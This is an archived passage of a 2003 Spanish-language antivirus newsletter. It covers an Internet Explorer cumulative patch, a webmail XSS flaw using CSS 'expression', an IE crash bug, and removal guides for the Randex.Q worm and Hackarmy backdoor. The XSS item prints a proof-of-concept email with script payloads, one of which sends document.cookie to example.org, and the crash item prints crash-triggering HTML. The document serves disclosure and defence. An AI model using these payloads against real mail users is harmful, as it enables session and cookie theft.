|
Mostrando mensaje 233
|
|
< Anterior | Siguiente >
|
|
|
| Asunto: | VSantivirus No. 1184 Año 7, Sábado 4 de octubre de 2003 | | Fecha: | Sabado, 4 de Octubre, 2003 06:23:14 (-0300) | | Autor: | VSAntivirus.com <vsantivirus @...........com>
|
VSantivirus No. 1184 Año 7, Sábado 4 de octubre de 2003
_____________________________________________________________
El boletín diario de VSANTIVIRUS - http://www.vsantivirus.com
VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy
_____________________________________________________________
1 - MS03-040 Actualización acumulativa para IE (828750)
2 - Cuelgue en IE y diversos programas de correo
3 - W32/Randex.Q. Se propaga por redes, se controla por IRC
4 - Troj/Backdoor.Hackarmy.A. Troyano de acceso remoto
_____________________________________________________________
1 - MS03-040 Actualización acumulativa para IE (828750)
_____________________________________________________________
http://www.vsantivirus.com/vulms03-040.htm
MS03-040 Actualización acumulativa para IE (828750)
Por Redacción VSAntivirus
vsantivirus@videosoft.net.uy
Nivel de Gravedad: Crítica
Productos afectados por esta actualización:
Internet Explorer 5.01
Internet Explorer 5.5
Internet Explorer 6.0
Internet Explorer 6.0 para Windows Server 2003
Se trata de una actualización acumulativa para el Internet
Explorer que incluye todas las revisiones publicadas
anteriormente para Internet Explorer 5.01, 5.5 y 6.0.
Este parche soluciona además, algunas fallas que el anterior
no corregía totalmente.
En los últimos días, diversas clases de ataques y códigos
maliciosos (ver todos los artículos al respecto en
"Referencias"), se han estado aprovechando de una falla en el
Internet Explorer, que el anterior parche acumulativo (MS03-
032) no solucionaba adecuadamente (Vulnerabilidad de
etiquetas de objeto).
La falla ocurre debido a una interacción entre los tipos MIME
(Multipurpose Internet Mail Extensions), y la manera como se
manejan archivos HTML (HTA), empotrados en las etiquetas
OBJECT. Cuando un archivo HTA es referido por el atributo
DATA de un elemento OBJECT, y el servidor web devuelve el
"Content-Type" como "application/hta", el IE puede ejecutar
el archivo HTA directamente, sin la intervención del usuario.
Lo grave de esta falla, es que permite a un atacante ejecutar
código arbitrario en el sistema de un usuario, por el simple
acto de navegar por un sitio Web hostil o abrir un mensaje de
correo electrónico en formato HTML modificado maliciosamente.
El último caso al respecto, es el del gusano "Qhosts-1"
(conocido también como "StartPage.D", "Delude" o "Hatoy"). El
mismo es capaz de redirecciona diferentes sitios y cambiar la
configuración DNS del equipo del usuario infectado (ver
http://www.vsantivirus.com/qhosts.htm).
Esto afecta a cualquier equipo con la simple condición de
tener Internet Explorer instalado. Es decir, no es necesario
que se utilice IE como explorador Web, para verse afectado
por este problema.
* Descripción de las vulnerabilidades corregidas
* Vulnerabilidad de etiquetas de objeto en ventanas pop-up
Internet Explorer no puede determinar correctamente un tipo
de objeto que se devuelve de un servidor Web, en una ventana
emergente (pop-up windows). Un atacante puede utilizar este
punto vulnerable para ejecutar código arbitrario en el
sistema de un usuario.
Si un usuario visita el sitio Web del atacante, éste podría
aprovechar esta vulnerabilidad sin necesidad de ninguna otra
intervención de parte del usuario. Un atacante también podría
diseñar un mensaje de correo electrónico en formato HTML para
aprovecharse de esta vulnerabilidad.
* Vulnerabilidad de etiquetas de objeto con XML data binding
Esta falla ocurre porque el Internet Explorer no determina
adecuadamente el tipo de objeto devuelto desde un servidor
Web, al utilizarse "Data Binding", una técnica que permite
visualizar documentos XML a través de páginas HTML. Un
atacante puede utilizar este punto vulnerable para ejecutar
código arbitrario en el sistema de un usuario.
Si un usuario visita el sitio Web del atacante, éste podría
aprovechar esta vulnerabilidad sin necesidad de ninguna otra
intervención de parte del usuario. Un atacante también podría
diseñar un mensaje de correo electrónico en formato HTML para
aprovecharse de esta vulnerabilidad.
* Cambios adicionales
Adicionalmente, se ha realizado un cambio en el método por el
cuál el IE maneja la conducta del HTML dinámico (DHTML), en
la zona restringida. Es posible para un atacante utilizando
otra vulnerabilidad, que podría ser la explicada
anteriormente, lograr que el Internet Explorer ejecutara un
script en el contexto de la Zona de seguridad correspondiente
a Internet. También el atacante puede utilizar la habilidad
del Windows Media Player (WMP), para abrir URLs que sirvan
para el ataque. Un URL (Uniform Resources Locator o
Localizador Uniforme de Recursos), es un "apuntador" a la
ubicación de cualquier archivo, como por ejemplo una página
HTML.
El atacante tendría que construir en forma maliciosa un
correo electrónico con formato HTML y enviárselo a su víctima
para explotar esta falla. Alternativamente, también podría
construir un sitio web malicioso conteniendo una página web
diseñada especialmente para explotar esta vulnerabilidad.
Del mismo modo como ocurría con los anteriores parches
acumulativos para el IE, realizados en los boletines MS03-
004, MS03-015, MS03-020, y MS03-032, el actual parche causará
que la función window.showHelp( ) deje de funcionar. Si usted
ha aplicado previamente la actualización del componente HTML
Help, desde el artículo 811630 de la Knowledge Base
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;811630), podrá seguir utilizando la funcionalidad HTML
Help, luego de aplicar este parche.
También se recomienda instalar la actualización para Windows
Media Player a la que se refiere el artículo 828026 de la
Knowledge Base
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;828026). Esta actualización está disponible también desde
Windows Update, así como desde el Microsoft Download Center
para todas las versiones soportadas del Windows Media Player.
Esta actualización contiene un cambio en la forma de
comportarse de Windows Media Player, restringiendo la
posibilidad de explotar maliciosamente el HTML dinámico
(DHTML), en la zona restringida.
Para comprender mejor estas vulnerabilidades veamos este
cuadro comparativo por vulnerabilidad y versión del Explorer.
* Vulnerabilidad de etiquetas de objeto en ventanas pop-up
IE 5.01 SP3 (Crítica)
IE 5.01 SP4 (Crítica)
IE 5.5 SP2 (Crítica)
IE 6.0 Gold (Crítica)
IE 6.0 SP1 (Crítica)
IE 6.0 para Windows Server 2003 (Moderada)
* Vulnerabilidad de etiquetas de objeto con XML data binding
IE 5.01 SP3 (Crítica)
IE 5.01 SP4 (Crítica)
IE 5.5 SP2 (Crítica)
IE 6.0 Gold (Crítica)
IE 6.0 SP1 (Crítica)
IE 6.0 para Windows Server 2003 (Moderada)
* Gravedad acumulada de todos los problemas incluidos en esta
revisión
IE 5.01 SP3 (Crítica)
IE 5.01 SP4 (Crítica)
IE 5.5 SP2 (Crítica)
IE 6.0 Gold (Crítica)
IE 6.0 SP1 (Crítica)
IE 6.0 para Windows Server 2003 (Moderada)
* Descarga de parches
Los parches pueden descargarse de los siguientes enlaces:
1. Todas las versiones (excepto IE 6.0 para Windows Servidor
2003):
http://www.microsoft.com/windows/ie/downloads/critical/828750/default.asp
En este enlace después de escoger el idioma que le
corresponde (en "Select Language:"), será llevado a una
página para seleccionar una de estas versiones del IE:
Internet Explorer 6 SP1 (2.12 MB)
Internet Explorer 6 Windows XP (2.51 MB)
Internet Explorer 5.5 SP2 (2.23 MB)
Internet Explorer 5.01 Win 2000 SP3 y SP4 (1.84 MB)
2. Parche para IE 6.0 para Windows Server 2003:
http://www.microsoft.com/windows/ie/downloads/critical/828750s/default.asp
Seleccione la actualización en español, en la casilla "Select
Language:" a la derecha de la página.
El parche tiene un tamaño de 4.1 MB.
* Más información:
http://www.microsoft.com/security/security_bulletins/ms03-040.asp
http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
Microsoft Knowledge Base Article - 828750
http://support.microsoft.com/?kbid=828750
* IMPORTANTE:
Este parche sustituye a los anteriores (MS03-015, MS03-020,
MS03-032).
* Relacionados:
Proteja su equipo antes que sea demasiado tarde
http://www.vsantivirus.com/ev02-10-03.htm
Troj/VBS.Qhosts. Redirecciona sitios y cambia DNS
http://www.vsantivirus.com/qhosts.htm
Nuevos ataques producen cambios en la configuración DNS
http://www.vsantivirus.com/02-10-03.htm
Crecen ataques usando fallas que parche de IE no corrige
http://www.vsantivirus.com/30-09-03.htm
Parche crítico del Internet Explorer no funciona
http://www.vsantivirus.com/ev09-09-03.htm
Falla crítica en el Internet Explorer y como protegernos
http://www.vsantivirus.com/10-09-03.htm
MS03-032 Actualización acumulativa para IE (822925)
http://www.vsantivirus.com/vulms03-032.htm
Troj/Backdoor.Coreflood. Infecta desde páginas Web
http://www.vsantivirus.com/back-coreflood.htm
Falla crítica en el Internet Explorer y como protegernos
http://www.vsantivirus.com/10-09-03.htm
Troj/JunkSurf.B. Infecta con solo ver un HTML
http://www.vsantivirus.com/junksurf-b.htm
Troj/JunkSurf.A. Infecta con solo ver un HTML
http://www.vsantivirus.com/junksurf-a.htm
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________
2 - Cuelgue en IE y diversos programas de correo
_____________________________________________________________
http://www.vsantivirus.com/vul-stylesheets-mail.htm
Cuelgue en IE y diversos programas de correo
Bugs: XSS y "Crash" en IE, Outlook, etc. mediante un mal
filtrado de stylesheets
Publicado originalmente en Rynho Zeros Web
http://www.RZW.com.ar/
Según han publicado en la BugTraq, dos nuevos tipos de fallas
o errores han sido descubiertas, las cuales afectan a MS
Internet Explorer y ciertas aplicaciones de gestión de
correo, como Outlook, Eudora, SquirrelMail, etc.
* Primera falla
La primera falla se produce en el filtrado de los programas
de correo. Solo basta con ver un mensaje en la vista previa.
Introducción:
Los sistemas de correo basados en el web, chequeados a través
de Internet Explorer, pueden permitir la ejecución arbitraria
de código malicioso como Javascript.
Descripción:
La edición descripta aquí, no revela una vulnerabilidad en un
producto específico. Pero la combinación de características
del Internet Explorer con las del software común del Webmail
puede crear una vulnerabilidad.
1) Internet Explorer interpreta "stylesheets" para cualquier
etiqueta HTML, cuando no existe una. Por ejemplo:
<xbody style="...">
no es una etiqueta válida, pero se evalúan los atributos.
Puede ser considerado como una falla o como comportamiento
lógico, su magnitud puede variar. Y éste solo no es un
defecto de seguridad.
2) Internet Explorer puede evaluar expresiones de Javascript
en hojas de estilo con la palabra clave "expression":
<style type="text/css">
a {
width: expression(6 * 9 + 'px');
}
</style>
Esto no es una falla tampoco. Esta es una extensión
propietaria documentada.
3) Debido al aumento de emails solo HTML, la mayoría de los
programas mas populares de Webmail pueden exhibir el HTML del
email. En este contexto, el Javascript se debe quitar de cada
email. Para realizar esta tarea, son utilizados varios trucos
por las empresas de Webmail:
- Quitado o reemplazado de las etiquetas <script>
- Quitado o reemplazado de las URLs "javascript:"
- Quitado o reemplazado de propiedades tipo "onmouseover"
Vulnerabilidad:
Combinando el punto (2) con el (3) y si el Webmail no filtra
los "stylesheets" ni la palabra "expression", cualquier
Javascript contenido en un mensaje será ejecutado tan pronto
como el recipiente lo vea.
Cierto software del Webmail está enterado de esto y entonces
son reemplazadas o filtradas cualquier aparición de
"expression". Sin embargo, esto puede no trabajar cuando el
nombre de la característica se filtra (como "expression")
como lo permite el CSS. Lo anterior había sido realizado en
Yahoo! (esto fue aplicado rápidamente después de ser
divulgado).
Pero la mayoría del software no sabe simplemente sobre
"expression". Ellos no son culpables, y esto no es un falla
ni una vulnerabilidad. La "expression" es una extensión
propietaria. Las empresas de Webmails no tienen que saber
sobre las implicaciones posibles de cada extensión
propietaria de las versiones de los navegadores.
Sin embargo, cuando se cumplen las siguientes condiciones, el
Javascript es ejecutado:
- Las palabras claves "expression" no son filtradas
/reemplazadas por el software de Webmail.
- El cliente es Internet Explorer.
- Javascript no esta deshabilitado en el cliente.
Desafortunadamente, la mayoría de los sistemas públicos del
Webmail no trabajan cuando el Javascript esta deshabilitado.
Impacto:
Dependiendo del software del Webmail, el control completo de
la sesión del cliente puede ser posible. El correo privado
puede ser borrado o enviado a direcciones ajenas
perteneciente a atacantes, las cookies y los identificadores
de sesión pueden ser robados, etc.
Prueba
Los programas de Webmail suelen filtrar o reemplazar los
"stylesheets". Ciertos programas quitan totalmente todo lo
contenido en las etiquetas < head>... . Otros quitan las
etiquetas < body>... </body > (que eliminan posiblemente la
información de estilos de esta forma), en vez de convertirlas
en algo como < div>... </div >.
Cierto software quita totalmente las definiciones < style>...
</style > pero acepta el CSS inline. Esto es malo, porque
anima a las personas a enviar código incompleto de HTML3 en
vez de documentos bien formados, accesibles de XHTML.
El siguiente correo en HTML intenta agregar los workarounds
para esta clase de filtros, para probar si la palabra clave
"expression" es correctamente evaluada en Internet Explorer.
Actualmente funciona por lo menos con IE 6 + SquirrelMail,
Yahoo! y los programas de varios Webmails públicos y de
ciertos ISPs.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml";
xml:lang="fr">
<head>
<title>Webmail test</title>
<meta http-equiv="Content-Type"
content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:expression(alert(1))">
<style type="text/css">
h1 {
height:expression(alert(2));
background-image:e
xpression('url(http://example.org/'+document.cookie+$
}
</style>
<h1 style="width:expression(alert(3))">...</h1>
<div id="just-for-fun"><a
href="javascript:window.open(document.location);"
onmouseover="alert(4)">fireworks</a>
</div>
</body>
</html>
Solución
Para el usuario final, hay cuatro maneras de evitar esta
ejecución:
- No utilice Internet Explorer para chequear sus Webmails.
Y/O
- Deshabilite Javascript.
Y/O
- Configure el Webmail para mostrar solamente correos en
texto plano.
Y/O
- Deshabilite la vista previa en sus programas de correo.
Y/O
- Conéctese solamente con su Webmail cuando este 100% seguro
que los programas de Webmail han activado totalmente los
filtros o reemplazado de la palabra "expression" y este
atento ante una versión de dicho programa.
* Segunda falla
La segunda falla, afecta a todos estos productos y al igual
que la anterior es por una mal filtrado, pero ésta también
permita la ejecución de código.
La otra falla fue descubierta por Nick Johnson, mientras
diseñaba una página y se dio cuenta al equivocarse en una
combinación de HTML y CSS, que esto causaba que Internet
Explorer (IE 6.0.2600.0000 en W2k v5.00.2195 y IE 6.0.3790 en
2k3 Server v5.2.3790) se cerrara mostrando una pantalla de
error. Después de un poco de trabajo obtuvo el siguiente
código necesario para lograr esto:
<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>
Un poco de experimentación revelo lo siguiente:
La etiqueta con el id "one" puede ser cualquier etiqueta como
lo es 'display: block' por defecto.
La etiqueta con el id "two" puede ser cualquier etiqueta como
lo es 'display: inline' por defecto.
La etiqueta con el id "three" puede estar en cualquier
etiqueta, incluyendo etiquetas no contenedoras como <img>.
La etiqueta con la identificación "two" debe dejarse abierta.
El selector debe ser "#one #two", seleccionando simplemente
#two no funciona.
En Windows 2000, también se cierra el explorer cuando hacemos
clic sobre el archivo (debido a la vista previa).
Una breve mirada en una depuración en el caso del cierre del
IE revela que la dirección en que se produce el cerrado es
una instrucción de retorno (RET). Bueno, dejamos eso para los
más talentosos para definir cuando ocurre y porqué.
Este tipo de error también afecta al cliente Eudora en su
versión 6.0.0.22.
* Versiones Afectadas:
º Microsoft Internet Explorer 5.0 W9x/NT/2000/2003/XP
º Microsoft Internet Explorer 5.5 W9x/NT/2000/2003/XP
º Microsoft Internet Explorer 6.0.2600 W9x/NT/2000/2003/XP
º Microsoft Internet Explorer 6.0.2800.1106
W9x/NT/2000/2003/XP
º Microsoft Internet Explorer 6.0.2800.1106.xpsp2.030422-1633
W9x/NT/2000/2003/XP
º Microsoft Internet Explorer 6.0.3790 W9x/NT/2000/2003/XP
º Microsoft Outlook 10.3513.3501 SP1 y otros
W9x/NT/2000/2003/XP
º Eudora 6.0.0.22 W9x/NT/2000/2003/XP
º SquirrelMail 1.4.0 no lo filtra, mientras que la versión
1.4.2 si lo hace. Su actualización no es mala idea. ;)
También son afectadas otras versiones, las cuáles no han sido
confirmadas.
* Artículos Relacionados:
SecurityFocus BugTraq - Webmails + Internet Explorer can
create unwanted javascript execution:
http://www.securityfocus.com/archive/1/340118
SecurityFocus BugTraq - New IE crash: CSS + HTML
http://www.securityfocus.com/archive/1/340130
Traducción: Martin Aberastegue (XyborG)
Sitio: http://www.rzw.com.ar
Noticia publicada originalmente en
http://www.rzw.com.ar/article870.html
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________
3 - W32/Randex.Q. Se propaga por redes, se controla por IRC
_____________________________________________________________
http://www.vsantivirus.com/randex-q.htm
Nombre: W32/Randex.Q
Tipo: Gusano de Internet
Alias: W32.Randex.Q, Win32/Randex.Q, Backdor.IRCBot.gen,
W32/Sluter.worm
Tamaño: 39,424 bytes
Plataforma: Windows 32-bit
Fecha: 3/oct/03
Este gusano se propaga a través de redes, copiándose a si
mismo en los siguientes caminos:
\Admin$\system32\musirc4.71.exe
\c$\winnt\system32\musirc4.71.exe
Tiene capacidades de troyano, y puede recibir instrucciones
desde un canal de IRC (Internet Relay Chat) específico. Una
de esas instrucciones es la que ocasiona la propagación a
través de los recursos mencionados.
Cuando se ejecuta por primera vez, se copia en la siguiente
ubicación:
c:\windows\System\musirc4.71.exe
NOTA: "C:\Windows\System" puede variar de acuerdo al sistema
operativo instalado (con ese nombre por defecto en Windows
9x/ME, como "C:\WinNT\System32" en Windows NT/2000 y
"C:\Windows\System32" en Windows XP y Windows Server 2003).
Un usuario remoto puede realizar las siguientes acciones:
1. NTSCAN: calcula direcciones IP al azar para seleccionar la
computadora a infectar.
Intenta autenticarse en cada dirección IP creada, usando
diferentes contraseñas.
Luego se copia a si mismo en las computadoras cuyas
contraseñas de administrador sean débiles en la siguiente
ubicación, donde [IP] es la dirección IP autenticada:
\\[IP]\Admin$\system32\musirc4.71.exe
\\[IP]\c$\winnt\system32\musirc4.71.exe
2. SYN: Realiza ataques del tipo "syn flood" utilizando
paquetes SYN de 55808 bytes.
3. SYSINFO: Obtiene información de su víctima, tales como
velocidad de la CPU, memoria disponible, etc.
También intenta robar las llaves de registro de algunos
conocidos juegos.
Para ejecutar el gusano, crea una tarea programada, y también
agrega las siguientes entradas en el registro para
autoejecutarse en cada reinicio de Windows:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"MusIRC (irc.music.com) client" =
c:\windows\System\musirc4.71.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"MusIRC (irc.music.com) client" =
c:\windows\System\musirc4.71.exe
Finalmente se conecta a un canal de IRC específico para
recibir instrucciones remotas. Entre ellas las que le
permiten propagarse a otros recursos compartidos como vimos
al principio.
* Reparación manual
Nota: Recomendamos utilizar un programa tipo firewall
(cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá
la conexión de este y cualquier otro troyano con Internet,
así como cualquier intento de acceder a nuestro sistema.
ZoneAlarm (gratuito para su uso personal), además de ser un
excelente cortafuegos, también impide la ejecución de
cualquier adjunto con posibilidades de poseer virus (sin
necesidad de tener que actualizarlo con cada nueva versión de
un virus).
Más información:
Cómo configurar Zone Alarm 3.x
http://www.vsantivirus.com/za.htm
* Deshabilitar las recursos compartidos
Es importante desconectar cada computadora de cualquier red
antes de proceder a su limpieza.
* Antivirus
1. Actualice sus antivirus con las últimas definiciones
2. Ejecútelos en modo escaneo, revisando todos sus discos
3. Borre los archivos detectados como infectados
* Borrar los archivos creados por el gusano.
* En Windows 95/98/Me/NT/2000
1. Seleccione Inicio, Buscar, Archivos o carpetas
2. Asegúrese de tener en "Buscar en:" la unidad "C:", y de
tener seleccionada la opción "Incluir subcarpetas"
3. En "Nombre" ingrese (o corte y pegue), lo siguiente:
musirc4.71.exe; winnt32.dat
4. Haga clic en "Buscar ahora" y borre todos los archivos
encontrados
5. Cierre la ventana de búsqueda
6. Pinche con el botón derecho sobre el icono de la "Papelera
de reciclaje" en el escritorio, y seleccione "Vaciar la
papelera de reciclaje".
* En Windows XP
1. Seleccione Inicio, Buscar
2. Seleccione "Todos los archivos y carpetas"
3. En "Todo o parte del nombre de archivo" ingrese (o corte y
pegue), lo siguiente:
musirc4.71.exe; winnt32.dat
4. Verifique que en "Buscar en:" esté seleccionado "C:"
5. Pinche en "Más opciones avanzadas"
6. Seleccione "Buscar en carpetas del sistema"
7. Seleccione "Buscar en subcarpetas"
8. Haga clic en "Búsqueda" y borre todos los archivos
encontrados
9. Cierre la ventana de búsqueda
10. Pinche con el botón derecho sobre el icono de la
"Papelera de reciclaje" en el escritorio, y seleccione
"Vaciar la papelera de reciclaje".
* Editar el registro
1. Ejecute el editor de registro: Inicio, ejecutar, escriba
REGEDIT y pulse ENTER
2. En el panel izquierdo del editor, pinche en el signo "+"
hasta abrir la siguiente rama:
HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft
\Windows
\CurrentVersion
\Run
3. Pinche en la carpeta "Run" y en el panel de la derecha,
bajo la columna "Nombre", busque y borre la siguiente
entrada:
"MusIRC (irc.music.com) client"
4. En el panel izquierdo del editor, pinche en el signo "+"
hasta abrir la siguiente rama:
HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft
\Windows
\CurrentVersion
\RunServices
5. Pinche en la carpeta "RunServices" y en el panel de la
derecha, bajo la columna "Nombre", busque y borre la
siguiente entrada:
"MusIRC (irc.music.com) client"
6. Use "Registro", "Salir" para salir del editor y confirmar
los cambios.
7. Reinicie su computadora (Inicio, Apagar el sistema,
Reiniciar).
* Información adicional
* Mostrar las extensiones verdaderas de los archivos
Para poder ver las extensiones verdaderas de los archivos y
además visualizar aquellos con atributos de "Oculto", proceda
así:
1. Ejecute el Explorador de Windows
2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú
'Herramientas' (Windows Me/2000/XP), y pinche en 'Opciones' u
'Opciones de carpetas'.
3. Seleccione la lengüeta 'Ver'.
4. DESMARQUE la opción "Ocultar extensiones para los tipos de
archivos conocidos" o similar.
5. En Windows 95/NT, MARQUE la opción "Mostrar todos los
archivos y carpetas ocultos" o similar.
En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos
los archivos'.
En Windows Me/2000/XP, en 'Archivos y carpetas ocultos',
MARQUE 'Mostrar todos los archivos y carpetas ocultos' y
DESMARQUE 'Ocultar archivos protegidos del sistema
operativo'.
6. Pinche en 'Aplicar' y en 'Aceptar'.
* Limpieza de virus en Windows Me y XP
Si el sistema operativo instalado es Windows Me o Windows XP,
para poder eliminar correctamente este virus de su
computadora, deberá deshabilitar antes de cualquier acción,
la herramienta "Restaurar sistema" como se indica en estos
artículos:
Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm
Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________
4 - Troj/Backdoor.Hackarmy.A. Troyano de acceso remoto
_____________________________________________________________
http://www.vsantivirus.com/back-hackarmy-a.htm
Nombre: Troj/Backdoor.Hackarmy.A
Tipo: Caballo de Troya con acceso por puerta trasera
(backdoor)
Alias: Hackarmy, Hacarmy, Hackerarmy, Troj/Hackarmy-A,
Backdoor.Hacarmy, Backdoor.Hackerarmy, BackDoor-AZV
Tamaño: 19,456 bytes
Plataforma: Windows 32-bit
Fecha: 3/oct/03
Cuando el archivo del troyano (que puede tener cualquier
nombre), se ejecuta en la máquina de su víctima, un atacante
puede tomar el control de la misma.
Este troyano no posee rutinas de propagación, y suele
distribuirse manualmente. Las primeras versiones detectadas,
fueron enviadas en forma de spam a numerosos newsgroups.
Al ejecutarse, el troyano se copia en la siguiente ubicación:
c:\windows\system\win32server.scr
NOTA: "c:\windows\system" puede variar de acuerdo al sistema
operativo instalado (con ese nombre por defecto en Windows
9x/ME, como "c:\winnt\system32" en Windows NT/2000 y
"c:\windows\system32" en Windows XP y Windows Server 2003).
También modifica el registro para autoejecutarse en cada
reinicio de Windows:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Winsock32driver = win32server.scr
Crea el mutex BOTSMUTEX para no ejecutarse más de una vez en
memoria (un mutex es una especie de indicador que actúa de
semáforo indicador).
Luego, el troyano abre diferentes puertos TCP y UDP para
conectarse con un usuario remoto y avisar de su presencia.
También intenta conectarse además con un servidor IRC por el
puerto 6666. Si logra la conexión, puede recibir
instrucciones para ejecutar cualquiera de las siguientes
acciones en la máquina infectada, entre otras posibles:
Descargar y ejecutar cualquier archivo
Finalizar cualquier proceso activo en memoria
Robar información del sistema y del usuario
* Reparación manual
Nota: Recomendamos utilizar un programa tipo firewall
(cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá
la conexión de este y cualquier otro troyano con Internet,
así como cualquier intento de acceder a nuestro sistema.
ZoneAlarm (gratuito para su uso personal), además de ser un
excelente cortafuegos, también impide la ejecución de
cualquier adjunto con posibilidades de poseer virus (sin
necesidad de tener que actualizarlo con cada nueva versión de
un virus).
Más información:
Cómo configurar Zone Alarm 3.x
http://www.vsantivirus.com/za.htm
* Antivirus
Para la limpieza de este troyano, solo actualice sus
antivirus con las últimas definiciones, y ejecútelos en modo
escaneo, revisando todos sus discos. Luego borre los archivos
detectados como infectados:
c:\windows\system\win32server.scr
Si usted utiliza su PC, o pertenece a una organización que
por su naturaleza exige ser totalmente segura, se recomienda
borrar todo el contenido del disco duro, reinstalar de cero
el sistema operativo, y recuperar sus archivos importantes de
copias de respaldo anteriores.
Luego cambie todas sus contraseñas, incluso la de otros
usuarios a los que tenga acceso desde su computadora.
En el caso de una empresa con redes corporativas, contacte
con su administrador para tomar las acciones necesarias a fin
de cambiar todas las claves de acceso, así como reinstalar
Windows en todas las computadoras.
Esta es la única manera segura de no comprometer su seguridad
ante los posibles cambios realizados por el troyano.
* Editar el registro
1. Ejecute el editor de registro: Inicio, ejecutar, escriba
REGEDIT y pulse ENTER
2. En el panel izquierdo del editor, pinche en el signo "+"
hasta abrir la siguiente rama:
HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft
\Windows
\CurrentVersion
\Run
3. Pinche en la carpeta "Run" y en el panel de la derecha,
bajo la columna "Nombre", busque y borre la siguiente
entrada:
Winsock32driver
4. Use "Registro", "Salir" para salir del editor y confirmar
los cambios.
5. Reinicie su computadora (Inicio, Apagar el sistema,
Reiniciar).
* Información adicional
* Activar cortafuegos de Windows XP (Internet Conexión
Firewall)
NOTA: Utilice solo un cortafuegos al mismo tiempo. Sugerimos
ZoneAlarm, sin embargo, Windows XP trae su propio cortafuegos
(posee algunas limitaciones). Si instala ZA, no active ICF
(Internet Conexión Firewall) o viceversa.
Para activar ICF en Windows XP, siga estos pasos:
1. Seleccione Inicio, Panel de Control, Conexiones de Red e
Internet, Conexiones de Red.
2. Pinche con el botón derecho del mouse sobre "Conexión de
Red de Area Local" y seleccione Propiedades.
3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi
equipo y mi red limitando o impidiendo el acceso a él desde
internet".
4. Seleccione Aceptar, etc.
* Mostrar las extensiones verdaderas de los archivos
Para poder ver las extensiones verdaderas de los archivos y
además visualizar aquellos con atributos de "Oculto", proceda
así:
1. Ejecute el Explorador de Windows
2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú
'Herramientas' (Windows Me/2000/XP), y pinche en 'Opciones' u
'Opciones de carpetas'.
3. Seleccione la lengüeta 'Ver'.
4. DESMARQUE la opción "Ocultar extensiones para los tipos de
archivos conocidos" o similar.
5. En Windows 95/NT, MARQUE la opción "Mostrar todos los
archivos y carpetas ocultos" o similar.
En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos
los archivos'.
En Windows Me/2000/XP, en 'Archivos y carpetas ocultos',
MARQUE 'Mostrar todos los archivos y carpetas ocultos' y
DESMARQUE 'Ocultar archivos protegidos del sistema
operativo'.
6. Pinche en 'Aplicar' y en 'Aceptar'.
* Limpieza de virus en Windows Me y XP
Si el sistema operativo instalado es Windows Me o Windows XP,
para poder eliminar correctamente este virus de su
computadora, deberá deshabilitar antes de cualquier acción,
la herramienta "Restaurar sistema" como se indica en estos
artículos:
Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm
Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________
Pautas generales para mantenerse alejado de los virus
_____________________________________________________________
Recuerde estas pautas para mantener alejado de su computadora
cualquier riesgo de virus o troyanos:
1) Use regularmente un programa antivirus (nosotros siempre
recomendamos no confiar en uno solo, pero usar más de uno no
significa que debamos tenerlos a todos instalados,
simplemente ejecutamos esos antivirus en su opción de
escaneo, sobre la carpeta que contenga los archivos a
revisar). Y por supuesto, de nada vale usar algún antivirus
si no lo mantenemos actualizado con los upgrades, updates o
add-ons correspondientes. Actualmente, las actualizaciones
son diarias (AVP, Panda y otros) o al menos semanales. No
existen los "virus demasiados nuevos y sin antídotos", la
reacción de las casas de antivirus es inmediata en todos los
casos. Pero mejor pregúntese, si la suya también lo es a la
hora de actualizarse.
2) No abrir ningún mensaje ni archivo recibido a través del
correo electrónico de fuentes desconocidas o muy poco
conocidas. En el caso de personas conocidas, se deben
igualmente tomar las precauciones correspondientes.
Asegurarse con esa persona del envío ("Melissa" y otros
pueden ser enviados por conocidos que ignoran estar mandando
el virus en sus mensajes), y nunca ejecutarlos, sino
guardarlos en una carpeta temporal y pasarle a esa carpeta
dos o tres antivirus actualizados antes de tomar la opción de
ejecutarlos (.EXE) o abrirlos (.DOC, .RTF, etc.). Pero ante
cualquier duda, simplemente se debe optar por borrar el
mensaje (y archivos adjuntos). Como se dice vulgarmente, "la
confianza mata al hombre", en este caso a la PC.
3) Estar informado de cómo operan los virus, y de las
novedades sobre estos, alertas y anuncios críticos, en sitios
como el nuestro.
4) No bajar nada de sitios Web de los que no tenga
referencias de seriedad, o que no sean medianamente
conocidos. Y si se bajan archivos, proceder como los archivos
adjuntos. Copiarlos a una carpeta y revisarlos con dos o tres
antivirus actualizados antes de optar por ejecutarlos o
abrirlos.
_____________________________________________________________
Sobre este boletín
_____________________________________________________________
La distribución de este boletín es gratuita, y está amparada
bajo los derechos de Copyright registrados por Video Soft
(también los artículos publicados directamente en nuestra
